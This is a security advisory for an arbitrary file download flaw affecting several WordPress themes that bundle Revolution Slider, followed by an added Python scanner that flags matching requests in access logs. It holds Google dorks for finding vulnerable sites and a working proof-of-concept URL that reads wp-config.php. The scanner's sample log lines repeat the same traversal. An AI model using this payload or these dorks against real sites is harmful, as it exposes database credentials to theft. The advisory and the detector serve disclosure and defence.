WordPress CuckooTap Theme & eShop Arbitrary File Download

2014-09-01 / 2015-05-15
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

# WordPress CuckooTap Theme & eShop Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
# Tested on: Windows 7 and GNU/Linux
# Google Dork: "Index of" +/wp-content/themes/cuckootap/

# WordPress IncredibleWP Theme Arbitrary File Download
# Vendor Homepage: http://freelancewp.com/wordpress-theme/incredible-wp/
# Google Dork: "Index of" +/wp-content/themes/IncredibleWP/

# WordPress Ultimatum Theme Arbitrary File Download
# Vendor Homepage: http://ultimatumtheme.com/ultimatum-themes/s
# Google Dork: "Index of" +/wp-content/themes/ultimatum

# WordPress Medicate Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
# Google Dork: "Index of" +/wp-content/themes/medicate/

# WordPress Centum Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
# Google Dork: "Index of" +/wp-content/themes/Centum/

# WordPress Avada Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
# Google Dork: "Index of" +/wp-content/themes/Avada/

# WordPress Striking Theme & E-Commerce Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
# Google Dork: "Index of" +/wp-content/themes/striking_r/

# WordPress Beach Apollo Arbitrary File Download
# Vendor Homepage: https://www.authenticthemes.com/theme/apollo/
# Google Dork: "Index of" +/wp-content/themes/beach_apollo/

PoC:
http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
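Added example, not part of the original advisory: a small Python checker that scans web server access log lines for requests matching the shape of the PoC above (a hit on wp-admin/admin-ajax.php with action=revslider_show_image and an img parameter that traverses out of the intended directory), decoding URL-encoding first so encoded variants such as `..%2F` or double-encoded `%252e%252e` are not missed. The log lines are constructed for this example, the Apache combined log format and the function names are assumptions, and a finding with status 200 is marked as served, since that is the case where the file actually left the server.

```python
"""Flag revslider_show_image arbitrary-file-download attempts in access logs.

Added example; the sample log lines below are constructed, not real traffic.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format lines: two traversal attempts (plain and
# URL-encoded), one legitimate slider image request, one unrelated request.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Sep/2014:10:12:01 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 2931 "-" "curl/7.35.0"
203.0.113.5 - - [01/Sep/2014:10:12:03 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2F..%2Fwp-config.php HTTP/1.1" 200 2931 "-" "curl/7.35.0"
198.51.100.7 - - [01/Sep/2014:10:13:44 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=slides/banner.jpg HTTP/1.1" 200 48120 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Sep/2014:10:14:02 +0000] "GET /wp-content/themes/Avada/style.css HTTP/1.1" 200 7712 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def fully_decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (catches double encoding)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(img):
    """True if the img parameter escapes its directory or names an absolute path."""
    path = fully_decode(img).replace('\\', '/')
    return '..' in path.split('/') or path.startswith('/')


def classify(line):
    """Return a finding dict for a suspicious revslider_show_image request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    if not parts.path.endswith('/wp-admin/admin-ajax.php'):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if 'revslider_show_image' not in qs.get('action', []):
        return None
    for img in qs.get('img', []):
        if is_traversal(img):
            return {
                'ip': m.group('ip'),
                'time': m.group('ts'),
                'img': fully_decode(img),
                'status': m.group('status'),
                # 200 means the requested file was actually returned.
                'served': m.group('status') == '200',
            }
    return None


def scan(log_text):
    """Run classify() over every non-empty line and collect the findings."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        state = 'SERVED' if finding['served'] else 'blocked'
        print(f"{finding['time']} {finding['ip']} img={finding['img']} [{state}]")
```

Run against a real access log by replacing SAMPLE_LOG with the file contents; any finding marked served means wp-config.php (or whatever the img value named) should be treated as disclosed, and the database credentials and salts in it rotated.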


Copyright 2019, cxsecurity.com
